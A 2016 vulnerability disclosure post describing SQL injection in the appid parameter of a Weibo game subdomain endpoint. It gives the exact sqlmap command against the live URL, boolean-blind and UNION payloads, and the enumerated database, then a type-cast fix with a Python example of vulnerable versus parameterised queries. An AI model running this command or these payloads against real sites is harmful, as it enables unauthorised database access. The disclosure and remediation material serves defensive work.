
[July vulnerability disclosure] A Sina Weibo sub-site has a SQL injection (UNION-capable)






Details:

# Site

http://game.weibo.com

# Injection point: the appid parameter

http://game.weibo.com/webgame/ajax/pajaxGetServersList?callback=callback1&appid=3031123572&_=1464667300888

Proof of vulnerability:

python sqlmap.py -u "http://game.weibo.com/webgame/ajax/pajaxGetServersList?callback=callback1&appid=3031123572&_=1464667300888" -p appid --dbs

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: appid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: callback=callback1&appid=3031123572' AND 5987=5987 AND 'EGPq'='EGPq&_=1464667300888

Type: UNION query
Title: MySQL UNION query (80) - 13 columns
Payload: callback=callback1&appid=3031123572' UNION ALL SELECT 80,80,80,80,80,80,CONCAT(0x71787a7171,0x4f6b476570785a737754,0x716b706a71),80,80,80,80,80,80#&_=1464667300888
---
[22:02:01] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5

available databases [1]:
[*] app_vgwebgame

Fix:

Enforce a type cast: convert appid to an integer before it is used in the query.
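The fix above, worked through as an added example (not code from the original post or from the affected site): a handler that interpolates appid straight into the SQL string, beside one that first validates appid as a plain decimal integer and then binds it as a query parameter. The table name `servers`, its rows, and the use of an in-memory sqlite3 database as a stand-in for the real MySQL backend are all constructed for this example.

```python
import re
import sqlite3

# Constructed in-memory stand-in for the backend (assumption: the real service
# uses MySQL 5 per the sqlmap output; sqlite3 is used here so the example runs
# offline). Table and rows are made up for the demonstration.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE servers (appid INTEGER NOT NULL, name TEXT NOT NULL);
        INSERT INTO servers VALUES (3031123572, 'server-1');
        INSERT INTO servers VALUES (3031123572, 'server-2');
        INSERT INTO servers VALUES (1, 'other-app-server');
    """)
    return conn


def get_servers_vulnerable(conn, raw_appid):
    """Pattern behind the finding: the request parameter is pasted into the SQL
    text, so quote characters in appid change the query structure."""
    sql = "SELECT name FROM servers WHERE appid = '%s' ORDER BY name" % raw_appid
    return [row[0] for row in conn.execute(sql)]


class InvalidParameter(ValueError):
    """Raised when appid is not a plain decimal integer."""


# Only unsigned decimal digits are accepted. A bare int() call is not enough:
# int() also accepts "+1", " 1 " and (on Python 3.6+) "1_0".
_APPID_RE = re.compile(r"[0-9]{1,20}")


def parse_appid(raw_appid):
    """Enforce the type: reject anything that is not a decimal integer string."""
    if not isinstance(raw_appid, str) or _APPID_RE.fullmatch(raw_appid) is None:
        raise InvalidParameter("appid must be a decimal integer")
    return int(raw_appid)


def get_servers_fixed(conn, raw_appid):
    """Hardened handler: cast first, then bind the integer as a parameter so the
    value can never be interpreted as SQL."""
    appid = parse_appid(raw_appid)
    rows = conn.execute(
        "SELECT name FROM servers WHERE appid = ? ORDER BY name", (appid,)
    )
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    legit = "3031123572"
    # Constructed tautology input of the same shape as the boolean payload
    # shown in the sqlmap output above.
    tampered = "3031123572' OR '1'='1"
    print("vulnerable, legit:   ", get_servers_vulnerable(db, legit))
    print("vulnerable, tampered:", get_servers_vulnerable(db, tampered))
    print("fixed, legit:        ", get_servers_fixed(db, legit))
    try:
        get_servers_fixed(db, tampered)
    except InvalidParameter as exc:
        print("fixed, tampered:      rejected:", exc)
```

The cast and the bound parameter are both kept on purpose: the cast rejects malformed input early with a clear error, and the parameter binding means the query stays safe even if a later change to the handler passes a value that was not validated.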


Posted: 2016-7-19